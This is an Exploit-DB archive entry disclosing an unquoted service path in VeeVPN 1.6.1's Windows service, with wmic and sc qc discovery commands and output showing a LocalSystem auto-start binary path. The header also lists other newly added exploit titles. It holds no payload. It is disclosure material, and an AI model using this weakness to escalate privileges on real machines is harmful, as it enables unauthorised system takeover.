exploit-db-mirror/exploits/windows/local/52088.txt
Exploit-DB 04fa5ba95d DB: 2025-03-20
6 changes to exploits/shellcodes/ghdb

Gitea 1.24.0 - HTML Injection

Extensive VC Addons for WPBakery page builder 1.9.0 - Remote Code Execution (RCE)

Loaded Commerce 6.6 - Client-Side Template Injection(CSTI)

TranzAxis 3.2.41.10.26 - Stored Cross-Site Scripting (XSS) (Authenticated)

VeeVPN 1.6.1 - Unquoted Service Path
2025-03-20 00:16:32 +00:00

31 lines
No EOL
979 B
Text

# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
# Date: 2024-12-27
# Exploit Author: Doğukan Orhan
# Vendor Homepage: https://veepn.com/
# Version: 1.6.1
# Tested on: Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
#Service Info
C:\Users\PC>sc qc VeePNService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeePNService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\VeePN\service\VeePNService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VeePNService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.